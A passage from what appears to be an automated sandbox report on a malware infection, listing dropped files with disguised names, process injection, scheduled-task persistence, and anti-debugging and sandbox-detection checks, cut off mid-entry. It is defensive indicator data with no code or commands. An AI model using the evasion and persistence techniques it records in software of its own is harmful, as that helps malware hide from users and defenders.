C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 85651DF49C63B3B4 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
0Bone6aXxnHu42vsLpUqYgSL.exe0Bone6aXxnHu42vsLpUqYgSL.exe743B.exepid Process 1764 0Bone6aXxnHu42vsLpUqYgSL.exe 3120 0Bone6aXxnHu42vsLpUqYgSL.exe 9060 743B.exe -
Suspicious use of SetThreadContext 21 IoCs
Processes:
Conhost.exeWed0971f17486f8.exesvchost.exe3496843.exerun.exeWpFILx0yw_EK8MsdJAiKhmLH.execk_6NCtiU3bUjW3jzeMQBw0u.execk_6NCtiU3bUjW3jzeMQBw0u.exetTFv5eumajuqhmuOdEfEaVku.exe0hp5lI2f2FoyQfBIrXA9ES2X.exez4HyLiMdE8kxdxosrFQYODgR.exemstsc.exeA8A6.exeB0DE.exeB0DE.exebuild3.exebuild2.exeregsvr32.exemstsca.exemstsca.exedescription pid Process procid_target PID 2328 set thread context of 3964 2328 Conhost.exe 119 PID 1336 set thread context of 752 1336 Wed0971f17486f8.exe 118 PID 4020 set thread context of 5276 4020 svchost.exe 155 PID 6116 set thread context of 5648 6116 3496843.exe 182 PID 3164 set thread context of 3480 3164 run.exe 194 PID 1048 set thread context of 3032 1048 WpFILx0yw_EK8MsdJAiKhmLH.exe 9 PID 6608 set thread context of 3032 6608 ck_6NCtiU3bUjW3jzeMQBw0u.exe 9 PID 4736 set thread context of 3032 4736 ck_6NCtiU3bUjW3jzeMQBw0u.exe 9 PID 1048 set thread context of 3032 1048 WpFILx0yw_EK8MsdJAiKhmLH.exe 9 PID 4772 set thread context of 1768 4772 tTFv5eumajuqhmuOdEfEaVku.exe 243 PID 2288 set thread context of 4056 2288 0hp5lI2f2FoyQfBIrXA9ES2X.exe 249 PID 4880 set thread context of 6308 4880 z4HyLiMdE8kxdxosrFQYODgR.exe 250 PID 6320 set thread context of 3032 6320 mstsc.exe 9 PID 6172 set thread context of 5000 6172 A8A6.exe 278 PID 9624 set thread context of 5040 9624 B0DE.exe 486 PID 9128 set thread context of 4420 9128 B0DE.exe 504 PID 8972 set thread context of 9108 8972 build3.exe 509 PID 4376 set thread context of 2116 4376 build2.exe 514 PID 5004 set thread context of 8868 5004 regsvr32.exe 530 PID 9732 set thread context of 7140 9732 mstsca.exe 552 PID 6084 set thread context of 5700 6084 mstsca.exe 570 -
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral5/files/0x000400000001abe0-167.dat autoit_exe behavioral5/files/0x000400000001abe0-189.dat autoit_exe -
Drops file in Program Files directory 34 IoCs
Processes:
a4hC89JjzvN7O07q6G1UDT5s.exejg1_1faf.exeDYbALA.exeWed09d27135e5a8b3b.tmpcAYo3Q8suZBbt4C5trcF26B3.exemsiexec.exeConhost.exeDYbALA.exemstsc.exeExplorer.EXEdescription ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe a4hC89JjzvN7O07q6G1UDT5s.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm jg1_1faf.exe File created C:\Program Files (x86)\WindowsPowerShell\Dedyfilytu.exe DYbALA.exe File created C:\Program Files (x86)\WindowsPowerShell\Dedyfilytu.exe.config DYbALA.exe File created C:\Program Files (x86)\FarLabUninstaller\is-B65M9.tmp Wed09d27135e5a8b3b.tmp File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe cAYo3Q8suZBbt4C5trcF26B3.exe File created C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Wed09d27135e5a8b3b.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe a4hC89JjzvN7O07q6G1UDT5s.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Conhost.exe File created C:\Program Files (x86)\Windows Multimedia Platform\SHaefasotega.exe.config DYbALA.exe File opened for modification C:\Program Files (x86)\O9r6hzlkh\_jxt0z7tbh.exe mstsc.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Wed09d27135e5a8b3b.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW jg1_1faf.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm jg1_1faf.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\RGRFZNFEOF\foldershare.exe.config DYbALA.exe File opened for modification C:\Program Files (x86)\O9r6hzlkh Explorer.EXE File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe msiexec.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe a4hC89JjzvN7O07q6G1UDT5s.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini a4hC89JjzvN7O07q6G1UDT5s.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Conhost.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\RGRFZNFEOF\foldershare.exe DYbALA.exe File created C:\Program Files\7-Zip\XFWWFEGLBW\foldershare.exe DYbALA.exe File created C:\Program Files (x86)\Windows Multimedia Platform\SHaefasotega.exe DYbALA.exe File created C:\Program Files (x86)\O9r6hzlkh\_jxt0z7tbh.exe Explorer.EXE File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe cAYo3Q8suZBbt4C5trcF26B3.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb jg1_1faf.exe File created C:\Program Files\7-Zip\XFWWFEGLBW\foldershare.exe.config DYbALA.exe -
Drops file in Windows directory 45 IoCs
Processes:
MicrosoftEdgeCP.exemsiexec.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeExplorer.EXEdescription ioc Process File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI80C0.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSIDCDC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4738.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4B8E.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI593E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI867E.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIE058.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI52F3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI78CE.tmp msiexec.exe File created C:\Windows\Installer\f7eb946.msi msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\f7eb943.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID75B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID96F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDAF7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8799.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSIE29B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI843B.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI4F87.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI8865.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri Explorer.EXE File created C:\Windows\Installer\f7eb943.msi msiexec.exe File opened for modification C:\Windows\Installer\MSICE13.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI57C6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7EFA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8F8B.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 13 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 5116 3960 WerFault.exe 97 5116 3960 WerFault.exe 97 5432 3960 WerFault.exe 97 6124 3960 WerFault.exe 97 4516 4868 WerFault.exe 130 5672 4588 WerFault.exe 125 6124 4868 WerFault.exe 130 6136 4172 WerFault.exe 136 6128 4868 WerFault.exe 130 6048 6116 WerFault.exe 173 5896 4868 WerFault.exe 130 4240 3960 WerFault.exe 97 3536 3164 WerFault.exe 147 -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Wed09b2a8bc4f16cb.exeA8A6.exeC71D.exeMicrosoftEdgeCP.exe0hp5lI2f2FoyQfBIrXA9ES2X.exeSG5COJhctDghfNe0iIIPrpP1.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A8A6.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C71D.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MicrosoftEdgeCP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0hp5lI2f2FoyQfBIrXA9ES2X.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI SG5COJhctDghfNe0iIIPrpP1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI SG5COJhctDghfNe0iIIPrpP1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0hp5lI2f2FoyQfBIrXA9ES2X.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A8A6.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A8A6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C71D.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MicrosoftEdgeCP.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0hp5lI2f2FoyQfBIrXA9ES2X.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C71D.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MicrosoftEdgeCP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI SG5COJhctDghfNe0iIIPrpP1.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
mBeq4rQAAJTfUezIixpwFY0d.exemBeq4rQAAJTfUezIixpwFY0d.exeD305.exeB92C.exebuild2.exesvchost.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mBeq4rQAAJTfUezIixpwFY0d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mBeq4rQAAJTfUezIixpwFY0d.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 D305.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString D305.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 B92C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString B92C.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mBeq4rQAAJTfUezIixpwFY0d.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mBeq4rQAAJTfUezIixpwFY0d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 6156 schtasks.exe 8244 schtasks.exe 6516 schtasks.exe 9728 schtasks.exe 2400 schtasks.exe 4204 schtasks.exe 2284 schtasks.exe 3484 schtasks.exe -
Delays execution with timeout.exe 5 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid Process 4624 timeout.exe 4960 timeout.exe 8204 timeout.exe 1628 timeout.exe 4432 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
chkdsk.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier chkdsk.exe -
Kills process with taskkill 16 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 9628 taskkill.exe 6568 taskkill.exe 7016 taskkill.exe 8576 taskkill.exe 9312 taskkill.exe 8992 taskkill.exe 4016 taskkill.exe 6704 taskkill.exe 6060 taskkill.exe 2164 taskkill.exe 9024 taskkill.exe 7156 taskkill.exe 5144 taskkill.exe 4136 taskkill.exe 6980 taskkill.exe 6388 taskkill.exe -
Processes:
browser_broker.exemshta.exeMicrosoftEdge.exemstsc.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" mshta.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mshta.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \Registry\User\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 mstsc.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 19 IoCs
Processes:
svchost.exemsiexec.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exemsiexec.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000e28645b71c12d0e6741cddc67ff95fbc426ec935f0ebe62af1def099f7c15bcaebe47046071860d8a4aa7645d35842838aef95f57c780b92f14686e2 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 25878e9240cbd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (data) 